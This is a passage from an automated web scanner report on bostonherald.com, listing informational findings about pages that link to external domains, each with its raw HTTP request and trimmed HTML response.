<a class="buy_photos" target="_blank" href="http://gallery.pictopia.com/bostonherald/gallery/news\\Snow piles up in Bay State"><img src="/images/siteImages/icons/photos.png" /></a> <a class="buy_photos" target="_blank" style="font-size: 11px" href="http://gallery.pictopia.com/bostonherald/gallery/news\\Snow piles up in Bay State">Purchase Herald Photos</a>
...[SNIP]...
<div id="embedDiv">
<iframe src='http://widgets.mobilelocalnews.com?uid=42b39fdb198522d2bfc6b1f64cd98365' frameborder='0' height='325' width='305' scrolling='no'></iframe>
...[SNIP]...
<a href="/news/regional/view/20110128disabled_resident_tells_city_tap_kids_to_shovel/"><img src="http://multimedia.heraldinteractive.com/images/20110127/stp/817069_Snowride_01282011.jpg" alt="Disabled resident tells city: Tap kids to shovel" /></a>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.292. http://www.bostonherald.com/photobox/index.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/photobox/index.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/photobox/index.bg?type=home&page=3

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fphotobox%2Findex.bg%3Ftype%3Dhome%26page%3D3&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /photobox/index.bg?type=home&page=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:14:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28853

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

<link rel="alternate" title=" - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fphotobox%2Findex.bg%3Ftype%3Dhome%26page%3D3&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.293. http://www.bostonherald.com/projects/mcas2009 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/mcas2009

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/projects/mcas2009?srvc=slider

The response contains the following links to other domains:

http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com/news/home
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/scriptaculous/prototype.js
http://cache.heraldinteractive.com/js/scriptaculous/scriptaculous.js?=load=effects
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /projects/mcas2009?srvc=slider HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:24 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28042

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



   <link rel="alternate" title=" - " href="http://feeds.feedburner.com/bostonherald" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" width="242" height="90"></a>
    </div>
    <div id="headerAd">
<IFRAME WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 name=i_top ID=i_top FRAMEBORDER=0 SCROLLING=no BORDERCOLOR="#efefef" SRC="http://bh.heraldinteractive.com/includes/processAds.bg?position=Top&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com/news/home"></IFRAME>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="/images/siteImages/icons/social_media/16px/facebook.png" />
...[SNIP]...
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="/images/siteImages/icons/social_media/16px/twitter.png" />
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.294. http://www.bostonherald.com/projects/your_tax_dollars.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/projects/your_tax_dollars.bg

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/projects/your_tax_dollars.bg?src=Mwra

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fprojects%2Fyour_tax_dollars.bg%3Fsrc%3DMwra&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /projects/your_tax_dollars.bg?src=Mwra HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:03:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28294

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

<link rel="alternate" title=" - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fprojects%2Fyour_tax_dollars.bg%3Fsrc%3DMwra&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
<input type="button" value="Go" onClick="PayrollTable.setPageNumber(1);PayrollTable.getRows();"> <img id="ajax-loader" style="position: relative; top: 2px; display: none;" src="http://cache.heraldinteractive.com/images/siteImages/icons/ajax-loader.gif" />
<a id="clear_results" href="javascript: void(0);" onclick="PayrollTable.initialize();" style="display: none;" >
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.295. http://www.bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/search/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/search/?topic=Hillary

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DHillary&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
